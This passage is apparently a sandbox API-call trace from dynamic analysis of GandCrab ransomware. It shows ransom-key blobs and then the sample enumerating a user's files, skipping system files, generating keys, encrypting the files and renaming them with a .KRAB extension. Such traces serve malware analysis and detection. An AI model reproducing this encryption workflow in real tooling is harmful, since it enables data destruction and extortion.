gIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.894] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.895] CloseHandle (hObject=0x440) returned 1 [0057.895] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.896] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.896] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x5, wMilliseconds=0x5d)) [0057.896] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.896] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.896] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.896] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a08d2ca4dee3d.lock") returned 90 [0057.896] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0057.897] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.897] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.897] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\") returned 67 [0057.897] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0057.897] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd8a0 [0057.898] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.898] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.898] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.898] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.898] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.898] lstrcmpW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2=".") returned 1 [0057.898] lstrcmpW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="..") returned 1 [0057.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="APASixthEditionOfficeOnline.xsl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" [0057.898] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.898] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.KRAB") returned 103 [0057.898] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0057.898] lstrlenW (lpString=".xsl") returned 4 [0057.898] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.898] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xsl ") returned 5 [0057.898] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.899] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0057.899] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="desktop.ini") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="autorun.inf") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="ntuser.dat") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="iconcache.db") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="bootsect.bak") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="boot.ini") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="ntuser.dat.log") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="thumbs.db") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="KRAB-DECRYPT.html") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="CRAB-DECRYPT.txt") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="ntldr") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="NTDETECT.COM") returned -1 [0057.899] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="Bootfont.bin") returned -1 [0057.899] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.899] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc210) returned 1 [0057.900] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.900] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.900] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.900] CryptGenRandom (in: hProv=0xfbc210, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0057.900] CryptReleaseContext (hProv=0xfbc210, dwFlags=0x0) returned 1 [0057.900] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.900] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbbc38) returned 1 [0057.901] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.901] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.901] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.901] CryptGenRandom (in: hProv=0xfbbc38, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0057.901] CryptReleaseContext (hProv=0xfbbc38, dwFlags=0x0) returned 1 [0057.901] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.902] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbd48) returned 1 [0057.902] CryptImportKey (in: hProv=0xfbbd48, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd8e0) returned 1 [0057.902] CryptGetKeyParam (in: hKey=0xfbd8e0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0057.902] CryptEncrypt (in: hKey=0xfbd8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0057.903] GetLastError () returned 0x0 [0057.903] CryptDestroyKey (hKey=0xfbd8e0) returned 1 [0057.903] CryptReleaseContext (hProv=0xfbbd48, dwFlags=0x0) returned 1 [0057.903] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbb28) returned 1 [0057.903] CryptImportKey (in: hProv=0xfbbb28, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd1a0) returned 1 [0057.903] CryptGetKeyParam (in: hKey=0xfbd1a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0057.903] CryptEncrypt (in: hKey=0xfbd1a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0057.903] GetLastError () returned 0x0 [0057.903] CryptDestroyKey (hKey=0xfbd1a0) returned 1 [0057.903] CryptReleaseContext (hProv=0xfbbb28, dwFlags=0x0) returned 1 [0057.904] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0057.904] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0057.904] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.904] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x51722, lpOverlapped=0x0) returned 1 [0057.974] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffae8de, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.974] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x51722, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x51722, lpOverlapped=0x0) returned 1 [0057.975] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0057.975] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.978] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.979] CloseHandle (hObject=0x448) returned 1 [0057.983] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.983] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl.krab")) returned 1 [0057.984] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.984] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.984] lstrcmpW (lpString1="CHICAGO.XSL", lpString2=".") returned 1 [0057.984] lstrcmpW (lpString1="CHICAGO.XSL", lpString2="..") returned 1 [0057.985] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="CHICAGO.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" [0057.985] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.985] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.KRAB") returned 83 [0057.985] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0057.985] lstrlenW (lpString=".XSL") returned 4 [0057.985] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.985] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".XSL ") returned 5 [0057.985] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.985] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0057.985] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0057.985] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="desktop.ini") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="autorun.inf") returned 1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="ntuser.dat") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="iconcache.db") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="bootsect.bak") returned 1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="boot.ini") returned 1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="ntuser.dat.log") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="thumbs.db") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="CRAB-DECRYPT.txt") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="ntldr") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="NTDETECT.COM") returned -1 [0057.986] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="Bootfont.bin") returned 1 [0057.986] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.986] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb4c8) returned 1 [0057.987] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.987] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.987] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.987] CryptGenRandom (in: hProv=0xfbb4c8, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0057.987] CryptReleaseContext (hProv=0xfbb4c8, dwFlags=0x0) returned 1 [0057.987] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.987] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc100) returned 1 [0057.988] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.988] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.988] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.988] CryptGenRandom (in: hProv=0xfbc100, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0057.988] CryptReleaseContext (hProv=0xfbc100, dwFlags=0x0) returned 1 [0057.989] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.989] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbc078) returned 1 [0057.989] CryptImportKey (in: hProv=0xfbc078, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd8e0) returned 1 [0057.989] CryptGetKeyParam (in: hKey=0xfbd8e0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0057.989] CryptEncrypt (in: hKey=0xfbd8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0057.990] GetLastError () returned 0x0 [0057.990] CryptDestroyKey (hKey=0xfbd8e0) returned 1 [0057.990] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0057.990] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbff0) returned 1 [0057.990] CryptImportKey (in: hProv=0xfbbff0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd360) returned 1 [0057.990] CryptGetKeyParam (in: hKey=0xfbd360, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0057.990] CryptEncrypt (in: hKey=0xfbd360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0057.991] GetLastError () returned 0x0 [0057.991] CryptDestroyKey (hKey=0xfbd360) returned 1 [0057.991] CryptReleaseContext (hProv=0xfbbff0, dwFlags=0x0) returned 1 [0057.991] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0057.991] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0057.992] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.992] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x48839, lpOverlapped=0x0) returned 1 [0058.041] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffb77c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.041] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x48839, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x48839, lpOverlapped=0x0) returned 1 [0058.046] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.047] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.050] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.053] CloseHandle (hObject=0x448) returned 1 [0058.057] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.058] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl.krab")) returned 1 [0058.059] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.059] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.059] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0058.060] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0058.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a08d2ca4dee3d.lock" 